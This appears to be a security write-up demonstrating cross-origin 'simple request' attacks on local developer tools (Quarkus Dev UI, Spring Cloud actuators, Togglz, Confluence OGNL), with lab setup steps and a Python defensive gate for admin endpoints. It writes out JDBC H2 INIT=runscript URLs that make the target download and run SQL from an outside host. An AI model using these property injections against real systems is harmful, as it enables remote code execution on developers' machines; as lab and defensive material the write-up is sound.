Simple Request Vulnerabilities in the Developer Environment
Following the guide below and clicking on the payload link will trigger an RCE on your local machine. In all but one instance this opens the Calculator app (assuming you are using a Mac); the Confluence case instead creates a file in /tmp.
The repo https://github.com/JoeBeeton/simple-request-attacks contains sample codebases for the vulnerabilities below, as well as a Dockerfile to run the payloads locally.
Quarkus RCE CVE-2022-4116
This vulnerability utilises the Dev UI, which is available when the application runs in Developer Mode. The Dev UI can modify application properties. Up until 2.14.2 it was possible to craft a simple request that modifies those properties and leverage that to execute arbitrary code in the target's JVM.
This is done by first setting the Quarkus app's JDBC URL to:
quarkus.datasource.jdbc.url=jdbc:h2:mem:testdb;INIT=runscript from 'https://github.bla:8081/exec.sql'
Then restarting the application via the /restart actuator so the change takes effect.
On startup, the Quarkus app will create an in-memory H2 database and call out to the URL named in the INIT clause (https://github.bla:8081/exec.sql above) to download the SQL and execute it. This leverages a feature of the in-memory H2 database to compile and execute a Java method, which in turn opens the Calculator app.
To run:
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-cloud-v1-vuln
mvn spring-boot:run
Payload Link
Spring Cloud
This works because Spring Cloud V1 allowed the /env actuator to modify properties with a POST request whose content type is application/x-www-form-urlencoded, which is exactly what a simple request can carry, so a simple request attack is possible.
This is done by first setting the Spring app's JDBC URL to:
spring.datasource.url=jdbc:h2:mem:testdb;INIT=runscript from 'http://somerandomsite.bla:8081/exec.sql'
Then restarting the application via the /restart actuator so the change takes effect.
On startup, the Spring app will create an in-memory H2 database and call out to http://somerandomsite.bla:8081/exec.sql to download the SQL and execute it. This leverages a feature of the in-memory H2 database to compile and execute a Java method, which in turn opens the Calculator app.
To run:
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-cloud-v1-vuln
mvn spring-boot:run
Payload Link
Togglz
This relies on the Togglz CSRF vulnerability CVE-2020-28191. A simple POST request can be made to localhost that modifies the feature toggle so that arbitrary Java code is executed via the Nashorn engine during toggle evaluation.
To run:
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-boot-hello-world-feature-enum
mvn spring-boot:run
Payload Link
Spring Actuator Shutdown
In Spring V2, actuators require a content type of application/json. But when a POST request has no message body, as with the /shutdown actuator, the actuator can still be triggered if no content type is specified at all. So a simple POST request can be used to shut down a Spring Boot app bound to localhost.
To run:
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-boot-hello-world-feature-enum
mvn spring-boot:run
Payload Link
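The Spring Cloud and actuator shutdown sections above both hinge on which requests a browser will send cross-origin without a CORS preflight (POST with a form content type, POST with no content type at all, plain GET). The following is an added example, not code from the original post or from the linked repo: it models the Fetch standard's "simple request" rule and a defensive gate for localhost admin endpoints that rejects cross-origin callers and insists on an explicit application/json content type on POST even when the body is empty. The Request class, the own_origin default and the sample headers are constructed for the example.

```python
from dataclasses import dataclass, field

# Per the Fetch standard a cross-origin request skips the CORS preflight when it
# uses one of these methods, only safelisted author headers and, if any, one of
# these Content-Types. A missing Content-Type still counts as "simple".
SIMPLE_METHODS = {"GET", "HEAD", "POST"}
SIMPLE_CONTENT_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}
SAFELISTED = {"accept", "accept-language", "content-language", "content-type"}
# Set by the browser rather than by page script, so they never trigger a preflight.
BROWSER_SET = {"host", "origin", "referer", "cookie", "user-agent", "content-length"}


@dataclass
class Request:  # minimal constructed model of an inbound HTTP request
    method: str
    path: str
    headers: dict = field(default_factory=dict)  # header name -> value
    body: bytes = b""

    def header(self, name):
        return {k.lower(): v for k, v in self.headers.items()}.get(name.lower())


def media_type(value):
    return value.split(";")[0].strip().lower() if value else None


def is_simple_request(req):
    """True if a browser would deliver this cross-origin without a CORS preflight."""
    if req.method.upper() not in SIMPLE_METHODS:
        return False
    for name in req.headers:
        lname = name.lower()
        if lname in BROWSER_SET or lname.startswith("sec-"):
            continue  # browser-controlled, not author-settable
        if lname not in SAFELISTED:
            return False  # a custom header forces a preflight
    ct = media_type(req.header("Content-Type"))
    return ct is None or ct in SIMPLE_CONTENT_TYPES


def gate_admin_request(req, own_origin="http://localhost:8080", require_json=True):
    """Defensive gate for Dev UI / actuator / toggle endpoints: reject anything the
    browser marks as another origin, and require an explicit application/json
    Content-Type on POST even when the body is empty (the /shutdown case)."""
    site = (req.header("Sec-Fetch-Site") or "none").lower()
    origin = req.header("Origin")
    if site not in ("none", "same-origin") or (origin and origin != own_origin):
        return False, "cross-origin request to an admin endpoint"
    if require_json and req.method.upper() == "POST" and media_type(req.header("Content-Type")) != "application/json":
        return False, "POST must declare Content-Type: application/json"
    return True, "ok"
```

Browsers that do not send Sec-Fetch-Site still send Origin on cross-origin POSTs, so the Origin comparison covers them. A top-level cross-site GET navigation from such a browser carries neither header and passes this gate, which is why the GET-triggered cases also need the endpoint's own input validation.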
Confluence CVE-2022-26134
This Confluence RCE relies on OGNL injection. Because it is triggered by a simple GET request, it can be launched via a simple request against localhost or an internal network that the victim has access to.
To run:
git clone https://github.com/vulhub/vulhub.git
cd vulhub/confluence/CVE-2022-26134
docker-compose up
Payload Link